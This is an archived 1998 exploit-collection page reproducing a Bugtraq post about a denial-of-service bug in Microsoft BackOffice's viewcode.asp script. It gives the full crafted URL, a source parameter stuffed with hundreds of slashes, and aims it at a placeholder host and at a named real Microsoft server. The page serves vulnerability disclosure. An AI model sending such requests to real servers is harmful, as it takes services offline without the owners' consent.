DOS attack on backoffice viewcode.asp

You can leave a host running backoffice in a state of not accepting connections by using http://server.com/whetever/viewcode.asp?source=/////////////////<lots more slashes>///

Author:

Anonymous

Compromise:

DOS attack against web server

Vulnerable Systems:

Those running Microsoft Backoffice with viewcode.asp available

Date:

14 January 1998

Details

Date: Wed, 14 Jan 1998 18:50:25 -0600
From: Aleph One <aleph1@DFW.DFW.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: MS BackOffice View Source
>From an anonymous contributor:
On a Microsoft Backorifice server you often get the
"View source" - eg on www.backoffice.microsoft.com
Unfortunately it appears there are problems with it. Querying
http://www.backoffice.microsoft.com/general/code/viewcode.asp?source=//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
leaves the host in question not accepting connections. Does anyone know if
this is a generic bug in backorifice or purely a fun feature of microsoft.com
[Anonymous]

More
Exploits!

The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:

This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces: